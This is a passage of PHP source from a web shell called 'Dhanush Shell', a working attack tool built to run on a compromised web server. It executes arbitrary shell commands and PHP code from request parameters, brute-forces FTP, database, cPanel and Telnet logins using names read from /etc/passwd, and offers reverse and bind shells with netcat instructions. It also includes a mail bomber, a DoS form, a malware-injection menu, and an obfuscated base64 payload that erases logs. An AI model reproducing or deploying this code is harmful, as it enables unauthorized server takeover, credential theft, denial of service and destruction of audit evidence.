  3505. <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
  3506. </td>
  3507. </tr>
  3508. </table>
  3509. </form><div id="showdos"></div>
  3510. <?php
  3511. }
  3512. else if(isset($_GET['mailbomb']))
  3513. { ?>
  3514. <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
  3515. <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
  3516. <?php
  3517. }
  3518. else if(isset($_GET['tools']))
  3519. {
  3520. ?>
  3521. <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
  3522. <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
  3523. <tr>
  3524. <td colspan="2" align="center"><b><font size='4' color="#FF0000">Port Scanner<br></font></b></td>
  3525. </tr>
  3526. <tr>
  3527. <td align="center">
  3528. <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
  3529. </td>
  3530. <td align="center">
  3531. <select class="sbox" name='protocol'>
  3532. <option value='tcp'>tcp</option>
  3533. <option value='udp'>udp</option>
  3534. </select>
  3535. </td>
  3536. <tr>
  3537. <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
  3538. </tr>
  3539. </form>
  3540. <tr><td colspan=2><div id="showports"></div>
  3541. </td></tr></table>
  3543. <br>
  3544. <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
  3545. <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
  3546. <tr>
  3547. <td colspan="2" align="center"><font size="4">BruteForce</font></td>
  3548. </tr>
  3549. <tr>
  3550. <td>Type : </td>
  3551. <td>
  3552. <select name="prototype" class="sbox">
  3553. <option value="ftp">FTP</option>
  3554. <option value="mysql">MYSQL</option>
  3555. <option value="postgresql">PostgreSql</option>
  3556. </select>
  3557. </td>
  3558. </tr>
  3559. <tr>
  3560. <td>Server <b>:</b> Port : </td>
  3561. <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
  3562. </tr>
  3563. <tr>
  3564. <td valign="middle">Brute type : </td>
  3565. <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
  3566. <label><input type=radio name=mytype value="2"> Dictionary</label><br>
  3567. Login : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="login" value="root" class="sbox"><br>
  3568. Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
  3569. </td>
  3570. </tr>
  3571. <tr>
  3572. <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
  3573. </tr>
  3574. </form><tr><td colspan="2" id="showbrute"></td></tr>
  3575. </table>
  3576. </center><br>
  3577. <?php
  3578. }
  3579. else if (isset($_GET["phpc"]))
  3580. {
  3581. ?>
  3582. <div id="showresult"></div>
  3583. <form name="frm">
  3584. <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
  3585. <br /><br />
  3586. <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
  3587. <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
  3588. </form>
  3589. <?php
  3590. }
  3591. else if(isset($_GET["exploit"]))
  3592. {
  3593. if(!isset($_GET["rootexploit"]))
  3594. {
  3595. ?>
  3596. <center>
  3597. <form action="<?php echo $self; ?>" method="get" target="_blank">
  3598. <input type="hidden" name="exploit">
  3599. <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
  3600. <tr>
  3601. <td style="height:60px;">
  3602. <font size="4" class=txt>Select Website</font></td><td>
  3603. <p><select id="rootexploit" name="rootexploit" class="box">
  3604. <option value="exploit-db">Exploit-db</option>
  3605. <option value="packetstormsecurity">Packetstormsecurity</option>
  3606. <option value="exploitsearch">Exploitsearch</option>
  3607. <option value="shodanhq">Shodanhq</option>
  3608. </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
  3609. <input type="submit" value="Search" class="but"></td></tr></table>
  3610. </form></center><br>
  3612. <?php
  3613. }
  3614. else
  3615. {
  3616. //exploit search
  3617. $Lversion = php_uname(r);
  3618. $OSV = php_uname(s);
  3619. if(eregi('Linux',$OSV))
  3620. {
  3621. $Lversion=substr($Lversion,0,6);
  3622. if($_GET['rootexploit'] == "exploit-db")
  3623. {
  3624. header("Location:$Lversion");
  3625. }
  3626. else if($_GET['rootexploit'] == "packetstormsecurity")
  3627. {
  3628. header("Location:$Lversion");
  3629. }
  3630. else if($_GET['rootexploit'] == "exploitsearch")
  3631. {
  3632. header("Location:$Lversion");
  3633. }
  3634. else if($_GET['rootexploit'] == "shodanhq")
  3635. {
  3636. header("Location:$Lversion");
  3637. }
  3638. }
  3639. else
  3640. {
  3641. $Lversion=substr($Lversion,0,3);
  3642. if($_GET['rootexploit'] == "exploit-db")
  3643. {
  3644. header("Location:$OSV+Lversion");
  3645. }
  3646. else if($_GET['rootexploit'] == "packetstormsecurity")
  3647. {
  3648. header("Location:$OSV+Lversion");
  3649. }
  3650. else if($_GET['rootexploit'] == "exploitsearch")
  3651. {
  3652. header("Location:$OSV+Lversion");
  3653. }
  3654. else if($_GET['rootexploit'] == "shodanhq")
  3655. {
  3656. header("Location:$OSV+Lversion");
  3657. }
  3658. }
  3659. //End of Exploit search
  3660. }
  3661. }
  3662. // Connect
  3663. else if(isset($_REQUEST['connect']))
  3664. {
  3665. ?>
  3666. <form action='<?php echo $self; ?>' method='POST' >
  3667. <table style="width:50%" align="center" >
  3668. <tr>
  3669. <th colspan="1" width="50px">Reverse Shell</th>
  3670. <th colspan="1" width="50px">Bind Shell</th>
  3671. </tr>
  3672. <tr>
  3673. <td>
  3674. <table style="border-spacing: 6px;">
  3675. <tr>
  3676. <td>IP </td>
  3677. <td>
  3678. <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
  3679. </td>
  3680. </tr>
  3681. <tr>
  3682. <td>Port </td>
  3683. <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
  3684. </tr>
  3685. <tr>
  3686. <td style="vertical-align:top;">Use:</td>
  3687. <td><select style="width: 95px;" name="lang" class="sbox">
  3688. <option value="perl">Perl</option>
  3689. <option value="python">Python</option>
  3690. <option value="php">PHP</option>
  3691. </select>&nbsp;&nbsp;
  3692. <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
  3693. </tr>
  3694. </table> </form>
  3695. </td>
  3697. <td style="vertical-align:top;">
  3698. <form method='post' >
  3699. <table style="border-spacing: 6px;">
  3700. <tr>
  3701. <td>Port</td>
  3702. <td>
  3703. <input style="width: 200px;" class="box" name="port" value="9891" />
  3704. </td>
  3705. </tr>
  3706. <tr>
  3707. <td>Password </td>
  3708. <td>
  3709. <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
  3710. </td>
  3711. <tr>
  3712. <td>Using</td>
  3713. <td>
  3714. <select style="width: 95px;" name="lang" id="lang" class="sbox">
  3715. <option value="perl">Perl</option>
  3716. <option value="c">C</option>
  3717. </select>&nbsp;&nbsp;
  3718. <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
  3719. </tr>
  3720. </table>
  3721. </td>
  3722. </form>
  3723. </tr>
  3724. <tr><td colspan=2><font color="#FF0000">Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</font></td></tr>
  3725. </table>
  3727. <?php
  3728. }
  3730. else if(isset($_REQUEST['404']))
  3731. {
  3732. ?>
  3733. <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
  3734. <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
  3735. </tr></table></center><br>
  3736. <div id="showdata"></div>
  3737. <?php
  3738. }
  3739. else if(isset($_GET['about']))
  3740. { ?>
  3741. <center>
  3742. <p><font size=6><u>D h a n u s h</u></font><br>
  3743. <font size=5>[--==Coded By Gennike==--]</font>
  3744. <div style='font-family: Courier New; font-size: 10px;'><font class=txt ><pre>
  3746. - -- -
  3747. -- -- --
  3748. -- --
  3749. --- ---
  3750. ------
  3751. ----
  3752. ----
  3753. ------
  3754. -------
  3755. --- --
  3756. -- ---
  3757. -- -----
  3758. --- --- ---
  3759. --- --- ---
  3760. -- --------- --
  3761. -- ------- --
  3762. -- ---- --
  3763. -- --- --
  3764. -- -- --
  3765. --- --- -- ---
  3766. ------ ------
  3767. ---- ----
  3770. </pre></font></div></center>
  3771. <font class="txt">Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it</font><br><br><center><font size=5>VIET NAM HACKER </font><br><font size=6>GENNNIKE</font></center><br>
  3772. <?php }
  3773. else if(isset($_GET['database']))
  3774. { ?>
  3775. <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
  3776. <table id="datatable" style="width:90%;" cellpadding="4" align="center">
  3777. <tr>
  3778. <td colspan="2">Connect To Database</td>
  3779. </tr>
  3780. <tr>
  3781. <td>Server Address :</td>
  3782. <td><input type="text" class="box" name="server" value="localhost"></td>
  3783. </tr>
  3784. <tr>
  3785. <td>Username :</td>
  3786. <td><input type="text" class="box" name="username" value="root"></td>
  3787. </tr>
  3788. <tr>
  3789. <td>Password:</td>
  3790. <td><input type="text" class="box" name="password" value=""></td>
  3791. </tr>
  3793. <tr>
  3794. <td></td>
  3795. <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
  3796. </tr>
  3797. </table>
  3798. </form>
  3799. <div id="showsql"></div>
  3800. <?php
  3801. }
  3802. // Cpanel Cracker
  3803. else if(isset($_REQUEST['cpanel']))
  3804. {
  3805. $cpanel_port="2082";
  3806. $connect_timeout=5;
  3807. ?>
  3808. <center>
  3809. <form method=post>
  3810. <table style="width:50%;border-color:#333333;" border=1 cellpadding=4>
  3811. <tr>
  3812. <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
  3813. </tr>
  3814. <tr>
  3815. <td align=center>User names</td><td align=center>Password</td>
  3816. </tr>
  3817. <tr>
  3818. <td align=center><textarea name=username rows=25 cols=22 class=box><?php
  3819. if($os != "Windows")
  3820. {
  3821. if(@file('/etc/passwd'))
  3822. {
  3823. $users = file('/etc/passwd');
  3824. foreach($users as $user)
  3825. {
  3826. $user = explode(':', $user);
  3827. echo $user[0] . "\n";
  3828. }
  3829. }
  3830. else
  3831. {
  3832. $temp = "";
  3833. $val1 = 0;
  3834. $val2 = 1000;
  3835. for(;$val1 <= $val2;$val1++)
  3836. {
  3837. $uid = @posix_getpwuid($val1);
  3838. if ($uid)
  3839. $temp .= join(':',$uid)."\n";
  3840. }
  3842. $temp = trim($temp);
  3844. if($file5 = fopen("test.txt","w"))
  3845. {
  3846. fputs($file5,$temp);
  3847. fclose($file5);
  3849. $file = fopen("test.txt", "r");
  3850. while(!feof($file))
  3851. {
  3852. $s = fgets($file);
  3853. $matches = array();
  3854. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  3855. $matches = str_replace("home/","",$matches[1]);
  3856. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3857. continue;
  3858. echo $matches;
  3859. }
  3860. fclose($file);
  3861. }
  3862. }
  3863. }
  3865. ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
  3866. </tr>
  3867. <tr>
  3868. <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
  3869. </tr>
  3870. <tr>
  3871. <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
  3872. </tr>
  3873. <tr>
  3874. <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
  3875. </tr>
  3876. </table>
  3877. </form>
  3878. </center>
  3879. <?php
  3880. }
  3881. else if(isset($_REQUEST['malattack']))
  3882. {
  3883. ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
  3884. <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
  3885. <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
  3886. <div id="showdata"></div>
  3887. <?php
  3888. }
  3889. else if(isset($_GET["com"]))
  3890. {
  3891. echo "<br>";
  3892. ob_start();
  3893. eval("phpinfo();");
  3894. $b = ob_get_contents();
  3895. ob_end_clean();
  3896. $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
  3897. $z = strpos($b,"</body>");
  3898. $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
  3899. echo $s_result;
  3900. }
  3901. else if(isset($_GET['execute']))
  3902. {
  3903. $comm = $_GET['execute'];
  3904. chdir($_GET['executepath']);
  3905. $check = shell_exec($comm);
  3907. echo "<center><textarea id=showexecute cols=120 rows=20 class=box>" . $check . "</textarea></center>";
  3909. ?>
  3910. <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
  3911. <input type="text" class="box" name="execute">
  3912. <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but"></form></center>
  3913. <?php
  3914. }
  3915. else if(isset($_GET['mycmd']))
  3916. {
  3917. if($_GET['mycmd']=="logeraser")
  3918. {
  3919. $erase = gzinflate(base64_decode("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"));
  3920. if(is_writable("."))
  3921. {
  3922. if($openp = fopen(getcwd()."/", 'w'))
  3923. {
  3924. fwrite($openp, $erase);
  3925. fclose($openp);
  3926. passthru("perl linux");
  3927. unlink("");
  3928. echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
  3929. }
  3930. } else
  3931. {
  3932. if($openp = fopen("/tmp/", 'w'))
  3933. {
  3934. fwrite($openp, $erase)or die("Error");
  3935. fclose($openp);
  3936. $aidx = passthru("perl linux");
  3937. unlink("");
  3938. echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
  3939. }
  3940. }
  3941. }
  3942. else
  3943. {
  3944. $check = shell_exec($_GET['mycmd']);
  3945. echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
  3946. }
  3947. }
  3948. else if(isset($_GET['prototype']))
  3949. {
  3950. echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
  3951. if( $_GET['prototype'] == 'ftp' )
  3952. {
  3953. function BruteFun($ip,$port,$login,$pass)
  3954. {
  3955. $fp = @ftp_connect($ip, $port?$port:21);
  3956. if(!$fp) return false;
  3957. $res = @ftp_login($fp, $login, $pass);
  3958. @ftp_close($fp);
  3959. return $res;
  3960. }
  3961. }
  3962. elseif( $_GET['prototype'] == 'mysql' )
  3963. {
  3964. function BruteFun($ip,$port,$login,$pass)
  3965. {
  3966. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  3967. @mysql_close($res);
  3968. return $res;
  3969. }
  3970. }
  3971. elseif( $_GET['prototype'] == 'pgsql' )
  3972. {
  3973. function BruteFun($ip,$port,$login,$pass)
  3974. {
  3975. $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
  3976. $res = @pg_connect($str);
  3977. @pg_close($res);
  3978. return $res;
  3979. }
  3980. }
  3982. $success = 0;
  3983. $attempts = 0;
  3984. $server = explode(":", $_GET['server']);
  3985. if($_GET['type'] == 1)
  3986. {
  3987. $temp = @file('/etc/passwd');
  3988. if( is_array($temp))
  3989. foreach($temp as $line)
  3990. {
  3991. $line = explode(":", $line);
  3992. ++$attempts;
  3993. if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
  3994. {
  3995. $success++;
  3996. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  3997. }
  3998. if(@$_GET['reverse'])
  3999. {
  4000. $tmp = "";
  4001. for($i=strlen($line[0])-1; $i>=0; --$i)
  4002. $tmp .= $line[0][$i];
  4003. ++$attempts;
  4004. if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
  4005. {
  4006. $success++;
  4007. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  4008. }
  4009. }
  4010. }
  4011. }
  4012. elseif($_GET['type'] == 2)
  4013. {
  4014. $temp = @file($_GET['dict']);
  4015. if( is_array($temp) )
  4016. foreach($temp as $line)
  4017. {
  4018. $line = trim($line);
  4019. ++$attempts;
  4020. if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
  4021. {
  4022. $success++;
  4023. echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
  4024. }
  4025. }
  4026. }
  4027. echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
  4028. }
  4029. // Execute Query
  4030. else if(isset($_GET["executeit"]))
  4031. {
  4032. if(isset($_GET['username']) && isset($_GET['server']))
  4033. {
  4034. $dbserver = $_GET['server'];
  4035. $dbuser = $_GET['username'];
  4036. $dbpass = $_GET['password'];
  4037. if(mysql_connect($dbserver,$dbuser,$dbpass))
  4038. {
  4039. setcookie("dbserver", $dbserver);
  4040. setcookie("dbuser", $dbuser);
  4041. setcookie("dbpass", $dbpass);
  4043. listdatabase();
  4044. }
  4045. else
  4046. echo "cannotconnect";
  4047. }
  4048. }
  4049. else if(isset($_GET['action']) && isset($_GET['dbname']))
  4052. {
  4053. if($_GET['action'] == "createDB")
  4054. {
  4055. $dbname = $_GET['dbname'];
  4056. $dbserver = $_COOKIE["dbserver"];
  4057. $dbuser = $_COOKIE["dbuser"];
  4058. $dbpass = $_COOKIE["dbpass"];
  4059. $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
  4060. mysql_query("create database $dbname",$mysqlHandle);
  4061. listdatabase();
  4062. }
  4063. if($_GET['action'] == 'dropDB')
  4064. {
  4065. $dbname = $_GET['dbname'];
  4066. $dbserver = $_COOKIE["dbserver"];
  4067. $dbuser = $_COOKIE["dbuser"];
  4068. $dbpass = $_COOKIE["dbpass"];
  4069. $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
  4070. mysql_query("drop database $dbname",$mysqlHandle);
  4071. mysql_close($mysqlHandle);
  4072. listdatabase();
  4073. }
  4075. if($_GET['action'] == 'listTables')
  4076. {
  4077. listtable();
  4078. }
  4080. // Create Tables
  4081. if($_GET['action'] == "createtable")
  4082. {
  4083. $dbserver = $_COOKIE["dbserver"];
  4084. $dbuser = $_COOKIE["dbuser"];
  4085. $dbpass = $_COOKIE["dbpass"];
  4086. $dbname = $_GET['dbname'];
  4087. $tablename = $_GET['tablename'];
  4088. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4089. mysql_select_db($dbname);
  4090. mysql_query("CREATE TABLE $tablename ( no INT )");
  4091. listtable();
  4092. }
  4094. // Drop Tables
  4095. if($_GET['action'] == "dropTable")
  4096. {
  4097. $dbserver = $_COOKIE["dbserver"];
  4098. $dbuser = $_COOKIE["dbuser"];
  4099. $dbpass = $_COOKIE["dbpass"];
  4100. $dbname = $_GET['dbname'];
  4101. $tablename = $_GET['tablename'];
  4102. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4103. mysql_select_db($dbname);
  4104. mysql_query("drop table $tablename");
  4105. listtable();
  4106. }
  4108. // Empty Tables
  4109. if($_GET['action'] == "empty")
  4110. {
  4111. $dbserver = $_COOKIE["dbserver"];
  4112. $dbuser = $_COOKIE["dbuser"];
  4113. $dbpass = $_COOKIE["dbpass"];
  4114. $dbname = $_GET['dbname'];
  4115. $tablename = $_GET['tablename'];
  4116. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4117. mysql_select_db($dbname);
  4118. mysql_query("delete from $tablename");
  4119. listtable();
  4120. }
  4122. // Empty Tables
  4123. if($_GET['action'] == "dropField")
  4124. {
  4125. $dbserver = $_COOKIE["dbserver"];
  4126. $dbuser = $_COOKIE["dbuser"];
  4127. $dbpass = $_COOKIE["dbpass"];
  4128. $dbname = $_GET['dbname'];
  4129. $tablename = $_GET['tablename'];
  4130. $fieldname = $_GET['fieldname'];
  4131. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4132. mysql_select_db($dbname);
  4133. $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
  4134. mysql_select_db( $dbname, $mysqlHandle );
  4135. mysql_query( $queryStr , $mysqlHandle );
  4136. listtable();
  4137. }
  4139. if($_GET['action'] == 'viewdb')
  4140. {
  4141. listdatabase();
  4142. }
  4144. // View Table Schema
  4145. if($_GET['action'] == "viewSchema")
  4146. {
  4147. $dbserver = $_COOKIE["dbserver"];
  4148. $dbuser = $_COOKIE["dbuser"];
  4149. $dbpass = $_COOKIE["dbpass"];
  4150. $dbname = $_GET['dbname'];
  4151. $tablename = $_GET['tablename'];
  4152. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4153. mysql_select_db($dbname);
  4154. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
  4155. $pResult = mysql_query( "SHOW fields FROM $tablename" );
  4156. $num = mysql_num_rows( $pResult );
  4157. echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
  4158. echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
  4159. for( $i = 0; $i < $num; $i++ )
  4160. {
  4161. $field = mysql_fetch_array( $pResult );
  4162. echo "<tr>\n";
  4163. echo "<td>".$field["Field"]."</td>\n";
  4164. echo "<td>".$field["Type"]."</td>\n";
  4165. echo "<td>".$field["Null"]."</td>\n";
  4166. echo "<td>".$field["Key"]."</td>\n";
  4167. echo "<td>".$field["Default"]."</td>\n";
  4168. echo "<td>".$field["Extra"]."</td>\n";
  4169. $fieldname = $field["Field"];
  4170. echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
  4171. echo "</tr>\n";
  4172. }
  4173. echo "</table>";
  4174. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
  4175. }
  4177. // Execute Query
  4178. if($_GET['action'] == "executequery")
  4179. {
  4180. $dbserver = $_COOKIE["dbserver"];
  4181. $dbuser = $_COOKIE["dbuser"];
  4182. $dbpass = $_COOKIE["dbpass"];
  4183. $dbname = $_GET['dbname'];
  4184. $tablename = $_GET['tablename'];
  4185. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4186. mysql_select_db($dbname);
  4187. $result = mysql_query($_GET['executemyquery']);
  4189. // results
  4190. echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
  4192. $count = 0;
  4193. while ($row = mysql_fetch_assoc($result))
  4194. {
  4195. echo "<tr>\r\n";
  4197. if ($count==0) // list column names
  4198. {
  4199. echo "<tr>\r\n";
  4200. while($key = key($row))
  4201. {
  4202. echo "<td><b>" . $key . "</b></td>\r\n";
  4203. next($row);
  4204. }
  4205. echo "</tr>\r\n";
  4206. }
  4208. foreach($row as $r) // list content of column names
  4209. {
  4210. if ($r=='') $r = '<font >NULL</font>';
  4211. echo "<td><font class=txt>" . $r . "</font></td>\r\n";
  4212. }
  4213. echo "</tr>\r\n";
  4214. $count++;
  4215. }
  4216. echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
